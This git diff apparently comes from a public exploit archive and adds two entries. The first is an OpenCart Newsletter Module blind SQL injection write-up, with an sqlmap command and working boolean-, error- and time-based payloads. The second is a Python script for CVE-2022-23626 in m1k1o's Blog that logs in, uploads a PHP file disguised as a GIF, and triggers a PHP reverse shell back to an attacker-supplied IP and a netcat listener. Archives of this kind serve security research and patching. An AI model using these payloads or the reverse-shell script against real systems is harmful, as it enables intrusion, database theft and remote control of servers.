diff --git a/exploits/php/webapps/50942.txt b/exploits/php/webapps/50942.txt new file mode 100644 index 000000000..b0f6740eb --- /dev/null +++ b/exploits/php/webapps/50942.txt @@ -0,0 +1,56 @@ +# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi +# Date: 19/05/2022 +# Exploit Author: Saud Alenazi +# Vendor Homepage: https://www.opencart.com/ +# Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez +# Version: v.3.0.2.0 +# Tested on: XAMPP, Linux +# Contact: https://twitter.com/dmaral3noz + + +* Description : + +Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +* Steps to Reproduce : +- Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter +- Save request in BurpSuite +- Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs + + + +Request : + +=========== + +POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Encoding: gzip,deflate +Content-Length: 29 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Connection: Keep-alive + +zemez_newsletter_email=saud + + +=========== + +Output : + +Parameter: zemez_newsletter_email (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) + Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK \ No newline at end of file diff --git a/exploits/php/webapps/50943.py b/exploits/php/webapps/50943.py new file mode 100755 index 000000000..fa61520c1 --- /dev/null +++ b/exploits/php/webapps/50943.py @@ -0,0 +1,161 @@ +# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) +# Date: 2022-01-06 +# Exploit Author: Malte V +# Vendor Homepage: https://github.com/m1k1o/blog +# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip +# Version: 1.3 and below +# Tested on: Linux +# CVE : CVE-2022-23626 + +import argparse +import json +import re +from base64 import b64encode +import requests as req +from bs4 import BeautifulSoup + +parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') +parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) +parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', + required=False) +parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, + required=False) +parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, + required=False) +parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) +parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) + +args = vars(parser.parse_args()) + +username = args['username'] +password = args['password'] +lhost_ip = args['ip'] +lhost_port = args['lport'] +address = args['url'] +port = args['port'] +url = f"http://{address}:{port}" + +blog_cookie = "" +csrf_token = "" +exploit_file_name = "" +header = { + "Host": f"{address}", + "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "X-Requested-With": "XMLHttpRequest", + "Csrf-Token": f"{csrf_token}", + "Cookie": f"PHPSESSID={blog_cookie}" +} + + +def get_cookie(complete_url): + global blog_cookie + cookie_header = {} + if not blog_cookie: + cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" + result = req.get(url=complete_url, headers=cookie_header) + if result.status_code == 200: + blog_cookie = result.cookies.get_dict()['PHPSESSID'] + print(f'[+] Found PHPSESSID: {blog_cookie}') + grep_csrf(result) + + +def grep_csrf(result): + global csrf_token + csrf_regex = r"[a-f0-9]{10}" + soup = BeautifulSoup(result.text, 'html.parser') + script_tag = str(soup.findAll('script')[1].contents[0]) + csrf_token = re.search(csrf_regex, script_tag).group(0) + print(f'[+] Found CSRF-Token: {csrf_token}') + + +def login(username, password): + get_cookie(url) + login_url = f"{url}/ajax.php" + login_data = f"action=login&nick={username}&pass={password}" + login_header = { + "Host": f"{address}", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "X-Requested-With": "XMLHttpRequest", + "Csrf-Token": f"{csrf_token}", + "Cookie": f"PHPSESSID={blog_cookie}" + } + result = req.post(url=login_url, headers=login_header, data=login_data) + soup = BeautifulSoup(result.text, 'html.parser') + login_content = json.loads(soup.text) + if login_content.get('logged_in'): + print('[*] Successful login') + else: + print('[!] Bad login') + + +def set_cookie(result): + global blog_cookie + blog_cookie = result.cookies.get_dict()['PHPSESSID'] + + +def generate_payload(command): + return f""" +-----------------------------13148889121752486353560141292 +Content-Disposition: form-data; name="file"; filename="malicious.gif.php" +Content-Type: application/x-httpd-php + +GIF; +-----------------------------13148889121752486353560141292-- +""" + + +def send_payload(): + payload_header = { + "Host": f"{address}", + "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", + "X-Requested-With": "XMLHttpRequest", + "Csrf-Token": f"{csrf_token}", + "Cookie": f"PHPSESSID={blog_cookie}" + } + upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" + command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" + payload = generate_payload(command) + print(f"[+] Upload exploit") + result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) + set_exploit_file_name(result.content.decode('ascii')) + + +def set_exploit_file_name(data): + global exploit_file_name + file_regex = r"[a-zA-Z0-9]{4,5}.php" + exploit_file_name = re.search(file_regex, data).group(0) + + +def call_malicious_php(file_name): + global header + complete_url = f"{url}/data/i/{file_name}" + print('[*] Calling reverse shell') + result = req.get(url=complete_url) + + +def check_reverse_shell(): + yes = {'yes', 'y', 'ye', ''} + no = {'no', 'n'} + choice = input("Have you got an active netcat listener (y/Y or n/N): ") + if choice in yes: + return True + elif choice in no: + print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"") + return False + +def main(): + enabled_listener = check_reverse_shell() + if enabled_listener: + login(username, password) + send_payload() + call_malicious_php(exploit_file_name) + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 3cb376b94..8e18cbd1f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -45004,3 +45004,5 @@ id,file,description,date,author,type,platform,port 50938,exploits/multiple/webapps/50938.txt,"T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)",1970-01-01,"Alperen Ergel",webapps,multiple, 50939,exploits/multiple/webapps/50939.txt,"T-Soft E-Commerce 4 - SQLi (Authenticated)",1970-01-01,"Alperen Ergel",webapps,multiple, 50941,exploits/php/webapps/50941.txt,"Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Akshay Ravi",webapps,php, +50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php, +50943,exploits/php/webapps/50943.py,"m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Malte V",webapps,php,